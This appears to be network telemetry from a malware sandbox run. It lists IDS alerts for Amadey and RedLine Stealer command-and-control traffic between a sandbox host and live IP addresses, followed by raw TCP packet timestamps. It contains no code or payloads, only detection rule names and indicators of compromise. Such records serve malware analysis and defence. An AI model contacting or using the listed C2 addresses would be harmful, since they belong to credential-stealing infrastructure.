                                                                                                                                                                2024-12-13T01:37:52.947721+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549832185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:37:59.165288+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549857185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:01.525345+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.549867185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:38:01.525345+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549867185.81.68.14780TCP
                                                                                                                                                                2024-12-13T01:38:05.047064+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:05.047064+01002046045ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:05.257576+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549877185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:05.490439+01002043234ET MALWARE Redline Stealer TCP CnC - Id1Response1185.81.68.1471912192.168.2.549876TCP
                                                                                                                                                                2024-12-13T01:38:10.649831+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:11.496837+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:11.616615+01002046056ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)1185.81.68.1471912192.168.2.549876TCP
                                                                                                                                                                2024-12-13T01:38:11.876385+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549900185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:12.106689+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:13.724329+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:14.163329+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:14.601349+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:15.038142+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:15.587566+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:16.246286+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:16.944208+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:17.552415+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:17.981386+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549922185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:19.335808+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:19.775980+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:20.215536+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:20.655213+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:22.416404+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:22.858077+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:23.399506+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:23.835507+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:24.207994+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549943185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:24.273386+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:24.713912+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:25.235281+01002043231ET MALWARE Redline Stealer TCP CnC Activity1192.168.2.549876185.81.68.1471912TCP
                                                                                                                                                                2024-12-13T01:38:30.823168+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549962185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:36.964250+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.549983185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:43.321073+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.550002185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:49.554536+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.550023185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:38:55.885915+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.550041185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:39:02.226578+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.550058185.81.68.14880TCP
                                                                                                                                                                2024-12-13T01:39:08.461476+01002856148ETPRO MALWARE Amadey CnC Activity M41192.168.2.550082185.81.68.14880TCP
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 13, 2024 01:37:00.175154924 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:00.295120001 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:00.295213938 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:00.295267105 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:00.415186882 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.625020981 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.625102043 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.625206947 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.626326084 CET4970480192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.626580954 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.746844053 CET8049704185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.747033119 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.747167110 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.747220993 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.868410110 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:01.868757963 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:01.988522053 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.409686089 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.409729004 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.409967899 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.411490917 CET4970580192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.412115097 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.531579971 CET8049705185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.531975031 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.532354116 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.532355070 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.652261972 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:03.652638912 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:03.772423983 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:04.993227959 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:04.993295908 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:04.993416071 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:05.004626036 CET4970680192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:05.005007029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:05.126826048 CET8049706185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:05.126960039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:05.127044916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:05.127501965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:05.247236967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461503029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461520910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461577892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.461905956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461925030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461945057 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.461975098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.462086916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.462104082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.462121010 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.462136984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.462148905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.462173939 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.462343931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.462634087 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.581523895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.581547022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.581744909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.585659027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.629667044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.654046059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.654153109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.654453993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.658133030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.658257008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.658366919 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.666618109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.666757107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.666903019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.675092936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.675157070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.675359964 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.683619976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.683773994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.688808918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.692106009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.692228079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.696808100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.700584888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.700839043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.704827070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.709072113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.709168911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.709357977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.717602968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.717731953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.717930079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.725944042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.725971937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.726139069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.749447107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.749545097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.749712944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.845690012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.845793962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.845921040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.848217964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.848373890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.848473072 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.853187084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.853290081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.853403091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.858191013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.858352900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.858479023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.863117933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.863202095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.863312960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.867866993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.868037939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.868176937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.872667074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.872797966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.872910976 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.877554893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.877635002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.877753973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.882364035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.882447958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.882565022 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.887137890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.887288094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.887424946 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.891946077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.892071009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.892366886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.896744013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.896852970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.897017002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.901567936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.901712894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.901837111 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.906347990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.906460047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.906580925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.911196947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.911359072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.911464930 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:06.916007996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:06.957832098 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.037724972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.037852049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.037976980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.039520979 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.039657116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.039766073 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.043351889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.043409109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.043524027 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.047089100 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.047144890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.047261953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.050817966 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.050925970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.051028013 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.054606915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.054730892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.054847956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.058382034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.058507919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.058610916 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.062146902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.062267065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.062372923 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.065922976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.066032887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.066149950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.069701910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.069818974 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.069936037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.073460102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.073637962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.073740005 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.077238083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.077368021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.077467918 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.081052065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.081223011 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.081343889 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.084805965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.084847927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.084963083 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.088573933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.088690996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.088807106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.092363119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.092418909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.092535973 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.096137047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.096246958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.096307993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.100275040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.100406885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.100523949 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.103696108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.103794098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.103888988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.107415915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.107573986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.107686043 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.111249924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.111320972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.111432076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.114995956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.115102053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.115206003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.118787050 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.118947029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.119054079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.122564077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.122682095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.122791052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.126322031 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.126440048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.126554966 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.130079985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.130224943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.130331993 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.133860111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.134005070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.134109020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.137604952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.137706995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.137814999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.141402006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.141519070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.141625881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.229605913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.229660988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.229861975 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.231180906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.231295109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.231406927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.234550953 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.234652996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.234761953 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:07.237900019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:07.237998009 CET8049707185.81.68.147192.168.2.5
